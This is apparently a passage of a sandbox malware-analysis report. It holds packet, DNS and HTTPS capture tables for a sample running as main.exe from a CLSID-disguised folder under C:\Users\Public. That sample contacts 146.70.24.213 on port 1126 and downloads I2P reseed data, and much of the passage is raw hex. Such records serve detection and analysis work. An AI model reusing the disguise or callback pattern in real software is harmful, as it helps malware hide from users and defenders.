                                                    Oct 12, 2024 20:30:07.177928925 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.177961111 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.177995920 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.178008080 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.178040981 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.178889990 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179090023 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179147959 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.179152012 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179203033 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179235935 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179260969 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.179269075 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179301977 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179315090 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.179336071 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179367065 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179379940 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.179419041 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179451942 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179465055 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.179486036 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179517031 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179548025 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.179569960 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179620028 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179653883 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179666996 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.179703951 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179729939 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.179754019 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179790974 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179827929 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179835081 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.179874897 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.179878950 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179910898 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.179960012 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180001974 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180011034 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180042028 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180075884 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180088997 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180108070 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180119991 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180141926 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180175066 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180190086 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180207968 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180239916 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180263042 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180273056 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180300951 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180320978 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180334091 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180375099 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180386066 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180418015 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180450916 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180474043 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180507898 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180553913 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180560112 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180593014 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180627108 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180655956 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180659056 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180691957 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180716991 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180723906 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180757046 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180788040 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180799961 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180821896 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180838108 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180855036 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180886984 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180897951 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.180919886 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180952072 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.180980921 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181006908 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.181013107 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181020975 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.181046963 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181078911 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181102037 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.181113005 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181145906 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181180000 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181194067 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.181212902 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181246042 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181246042 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.181278944 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181293964 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.181315899 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181346893 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181361914 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.181380987 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181415081 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.181442022 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.199126959 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199178934 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.199203968 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199238062 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199270010 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199290037 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.199306011 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199358940 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199405909 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.199425936 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199460983 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199493885 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199512005 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.199527025 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199532032 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.199562073 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199594975 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199626923 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199639082 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.199661016 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199670076 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.199692965 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199728966 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199760914 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199775934 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.199795008 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199805975 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.199827909 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199863911 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.199873924 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.221985102 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.222037077 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.222053051 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.222073078 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.222107887 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.222136021 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.222142935 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.222176075 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.222188950 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.222209930 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.222245932 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.222264051 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.266307116 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.266340017 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.266364098 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.266374111 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.266424894 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.266436100 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.266459942 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.266491890 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.266515017 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.266525030 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.266561031 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.266577959 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.269478083 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.269527912 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.269531965 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.269584894 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.269618988 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.269654036 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.269666910 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.269685984 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.269716978 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.269720078 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.269766092 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.270266056 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.270318031 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.270353079 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.270385027 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.270399094 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.270417929 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.270428896 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.270452023 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.270487070 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.270518064 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.270962954 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.270992041 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271018028 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.271043062 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271076918 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271109104 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271125078 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.271157026 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.271159887 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271192074 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271225929 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271246910 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.271259069 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271291971 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271300077 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.271325111 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271357059 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271400928 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.271409988 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271445990 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271477938 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271493912 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.271511078 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271521091 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.271593094 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271625996 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:07.271651983 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:07.271677971 CEST112649710146.70.24.213192.168.2.6
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 12, 2024 20:30:21.098134995 CEST192.168.2.61.1.1.10x7134Standard query (0)reseed.memcpy.ioA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 20:31:25.712086916 CEST192.168.2.61.1.1.10x7c45Standard query (0)reseed.stormycloud.orgA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 12, 2024 20:30:21.112405062 CEST1.1.1.1192.168.2.60x7134No error (0)reseed.memcpy.io95.216.2.172A (IP address)IN (0x0001)false
                                                    Oct 12, 2024 20:31:25.722909927 CEST1.1.1.1192.168.2.60x7c45No error (0)reseed.stormycloud.org144.172.118.154A (IP address)IN (0x0001)false
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.64979895.216.2.1724435252C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-12 18:30:21 UTC102OUTGET https://reseed.memcpy.io:443/i2pseeds.su3 HTTP/1.0
                                                    User-Agent: Wget/1.11.4
                                                    Connection: close
                                                    2024-10-12 18:30:22 UTC247INData Raw: 48 54 54 50 2f 31 2e 30 20 32 30 30 20 4f 4b 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 69 32 70 73 65 65 64 73 2e 73 75 33 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 37 32 37 39 36 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 6c 69 6d 69 74 3a 20 34 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 6d 61 69 6e 69 6e 67 3a 20 33 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 73 65 74 3a 20 39 30 30 0d 0a 64 61 74 65 3a 20 53 61 74 2c 20 31 32 20 4f 63 74 20 32 30 32 34 20 31 38 3a 33 30 3a 32 32 20 47 4d 54 0d 0a 0d 0a
                                                    Data Ascii: HTTP/1.0 200 OKcontent-disposition: attachment; filename=i2pseeds.su3content-length: 72796content-type: application/octet-streamx-ratelimit-limit: 4x-ratelimit-remaining: 3x-ratelimit-reset: 900date: Sat, 12 Oct 2024 18:30:22 GMT
                                                    2024-10-12 18:30:22 UTC14998INData Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 10 00 00 00 00 00 01 1a 14 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 32 38 35 38 36 37 39 38 00 00 00 00 00 00 68 6f 74 74 75 6e 61 40 6d 61 69 6c 2e 69 32 70 50 4b 03 04 14 00 08 00 08 00 a7 5d 4a 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 56 45 68 49 36 6e 75 63 38 2d 57 58 4d 45 57 6e 6c 55 33 78 63 70 55 73 4e 70 4e 71 69 53 66 4b 75 47 56 34 37 74 45 42 57 6f 30 3d 2e 64 61 74 55 54 05 00 01 4b be 07 67 ba f9 42 40 99 61 7e 50 63 61 56 45 d5 c1 c9 6f ca c5 7c fc ce 31 5c 3f 7e 8e cd b3 7c 76 9f fd 14 a6 2d e5 61 ef fa 5e f7 9e 9a d6 73 21 70 0e c3 af f7 fb bd cb 66 24 c6 e9 f5 3b 7f 9e 35 5d cf 50 45 67 54 1e bf bc 98 77 ae 78 2f fb 5f a3 3b 7d 73 a7 ed
                                                    Data Ascii: I2Psu31728586798hottuna@mail.i2pPK]JY;routerInfo-VEhI6nuc8-WXMEWnlU3xcpUsNpNqiSfKuGV47tEBWo0=.datUTKgB@a~PcaVEo|1\?~|v-a^s!pf$;5]PEgTwx/_;}s
                                                    2024-10-12 18:30:22 UTC1072INData Raw: 41 58 78 47 30 77 59 44 4d 30 56 4a 50 59 5a 55 76 7e 55 44 6e 54 68 6a 63 47 67 58 53 2d 7e 75 61 6c 32 41 7a 38 44 52 4e 6f 3d 2e 64 61 74 55 54 05 00 01 93 c9 07 67 e2 5f f4 7f c5 a6 97 cf 22 24 8b d4 4b e6 b9 84 ee d4 76 6b 0d dc 2a e8 7a bf d7 ee aa 54 f9 f2 00 a9 27 53 e7 55 bb ec d8 29 7f c4 52 c8 67 de 82 94 d7 52 ea bc ad 7b 4b 04 1f 3a f3 46 7c 08 90 53 9b 3f 2a 8f 5f 7e c1 5a 86 1a 1d c6 44 03 0b f3 a3 13 ff 5f cb 48 11 dc 2c 7e 23 e2 e9 dd a9 76 3b f5 78 d2 76 3f ef 61 65 60 61 60 67 60 61 60 60 9c 54 b1 c7 2b 8c 85 8f 01 0a 58 fd 42 9c 03 8c 18 1c 58 92 13 0b 8a 6d 19 4d ac 19 8b 6d 75 42 5d bd 93 12 1d 7d a3 74 3d 22 ab 52 9d cc cb f3 cd 53 53 93 dc 42 83 cd 3d 83 cc 52 2a c2 7c 33 3c 0a 75 4b dc fc a2 ea 0c f3 6d ad 19 cb 6c 19 8d ac 99 71
                                                    Data Ascii: AXxG0wYDM0VJPYZUv~UDnThjcGgXS-~ual2Az8DRNo=.datUTg_"$Kvk*zT'SU)RgR{K:F|S?*_~ZD_H,~#v;xv?ae`a`g`a``T+XBXmMmuB]}t="RSSB=R*|3<uKmlq
                                                    2024-10-12 18:30:22 UTC15248INData Raw: 4e 5e 91 25 25 39 a5 3e 65 65 91 ba a1 a6 85 f9 39 45 11 e6 ee b9 4e e5 ce 8e 91 95 4e 45 51 9e 75 85 fe ee 85 41 d9 b6 d6 8c 65 b6 8c 46 d6 5c 30 47 b2 fa 85 38 07 18 31 94 e3 74 9b 44 71 50 58 68 78 6a ae bb 7b b2 59 6e 65 4a aa 57 a1 53 4e a4 4f a0 2d 16 77 e4 26 19 38 67 3b 9b 5b 1a a7 06 e4 44 99 18 f8 e4 5a 04 86 85 9a 5a 46 55 46 98 1b 85 18 24 87 04 05 26 57 e6 5a ba 85 67 95 bb c2 dc c1 c0 a0 03 0d 1f 9f 20 6b d6 bc d4 12 cf 14 90 30 5f 51 7e 69 49 6a 91 5e 59 6a 51 71 66 7e 9e 2d 9b 81 9e a5 9e 99 89 35 e3 6d eb 32 d3 e9 bb 7d 8d 7f dc 12 ac fb e9 b9 53 ed 8a 99 e4 cf 88 6d 11 1d 0b 53 ce db 71 dd 66 ff 21 a8 23 7b d4 d8 96 e5 fc dc c5 e7 82 cd ad 97 b9 f6 1d 6b 6a 37 e9 d5 9b 78 f3 6a 43 52 e1 75 06 40 00 00 00 ff ff 50 4b 07 08 43 a6 f7 fd e1
                                                    Data Ascii: N^%%9>ee9ENNEQuAeF\0G81tDqPXhxj{YneJWSNO-w&8g;[DZZFUF$&WZg k0_Q~iIj^YjQqf~-5m2}SmSqf!#{kj7xjCRu@PKC
                                                    2024-10-12 18:30:22 UTC16320INData Raw: 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 7a 34 4d 59 6d 67 38 30 75 71 66 56 41 7a 55 49 34 6e 46 66 50 67 69 2d 68 58 70 67 76 44 54 46 77 39 79 7a 4d 38 51 4a 4d 49 73 3d 2e 64 61 74 55 54 05 00 01 3b e1 07 67 5a 9d b2 6a bd eb a5 22 e3 47 2c ce 06 ef bc 64 f9 eb 82 42 bd 98 85 b5 67 58 54 f3 d8 73 bd 5f af 7a ae 45 64 da 27 95 99 21 27 fb 2e fe 9f 12 d7 ba d1 c2 b0 f2 e2 8b 9b cb 8d 1f ee 7f de 16 10 d4 fa a6 67 e9 76 9e 4f 6b df f9 54 6f da c0 31 f3 ce 99 9f e2 2e b2 9e 0b 23 7a 4f 8b cb cf 29 e4 7b fe d5 82 bd cb fd 43 55 f1 5f fd dd 9b 5e 5d 59 e7 f8 e9 c9 e3 0a df 02 26 93 c9 ab 9d 56 fc fc 3f a1 9d 6b f6 cd ed 73 4b 3c 3e b6 07 1d dc b2 73 f1 34 8d ae 43 ed cf b8 fb 23 5d 79 df ac 0c 9d 13 dd fa 9f 69 a3 01 db
                                                    Data Ascii: ;routerInfo-z4MYmg80uqfVAzUI4nFfPgi-hXpgvDTFw9yzM8QJMIs=.datUT;gZj"G,dBgXTs_zEd'!'.gvOkTo1.#zO){CU_^]Y&V?ksK<>s4C#]yi
                                                    2024-10-12 18:30:22 UTC16320INData Raw: ed de ed b4 e3 1f 04 be 5a 97 94 71 98 b5 bb b8 ea c1 14 7a e8 c1 ef be 7f 64 92 74 c9 e3 92 74 89 44 da 29 9e ce 8e a7 65 4b fe 3b 59 95 59 6b 80 24 2f a5 3b 6c 2d 21 52 8a a8 a4 21 52 1e 81 90 32 bf a1 99 01 ed 60 a3 d1 e0 b4 d8 28 c8 60 f3 d6 08 44 05 4d 10 2e da df 54 c3 9b d4 56 7b 80 f6 ba 49 95 34 42 4a 21 d5 9a e5 c2 74 93 89 85 a4 97 ff ef e3 48 b9 87 62 b7 35 29 22 90 b1 dc 5f 2b 1a 75 1e 9b 51 07 86 5c b8 46 40 ea 9c 68 cc 01 1b 83 4e ce 82 02 21 31 54 41 aa 64 9c 4b 6c 01 c8 0c 10 83 70 14 80 09 44 99 22 70 99 94 4a 00 4e 11 b4 4c 28 a6 04 52 04 2f 13 86 e0 b0 6a 05 e7 01 48 79 14 a0 60 45 88 27 b0 04 ab 6b 2a d7 d3 16 9f 82 f5 ea 31 73 05 c1 13 6e 1b 13 65 5c 60 95 5d e1 ae 31 f1 08 b9 18 01 49 39 45 80 65 4a c1 ce 03 2d 6c ac b6 b2 8a 47 29
                                                    Data Ascii: ZqzdttD)eK;YYk$/;l-!R!R2`(`DM.TV{I4BJ!tHb5)"_+uQ\F@hN!1TAdKlpD"pJNL(R/jHy`E'k*1sne\`]1I9EeJ-lG)
                                                    2024-10-12 18:30:22 UTC8838INData Raw: 57 9b df 02 00 00 7a 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 45 0b 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 4d 6b 56 49 66 6b 67 4c 7e 6c 68 55 2d 6d 46 55 7a 45 37 49 52 49 53 6b 6d 56 75 4f 53 77 62 6a 52 2d 63 74 66 7e 63 75 4d 4d 30 3d 2e 64 61 74 55 54 05 00 01 8e bf 07 67 50 4b 01 02 14 00 14 00 08 08 08 00 55 64 4a 59 5f 06 e5 8a de 01 00 00 25 03 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 96 0e 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 35 43 67 4f 4a 48 4f 49 42 47 51 7e 47 74 6c 31 59 61 72 6a 6f 37 4e 58 62 71 67 6c 72 56 45 62 46 67 56 64 41 49 31 4d 73 6c 51 3d 2e 64 61 74 55 54 05 00 01 e3 c9 07 67 50 4b 01 02 14 00 14 00 08 00 08 00 e0 6e 4a 59 17 fe 67 e3 94 04 00 00 e2 05 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 e6 10 00
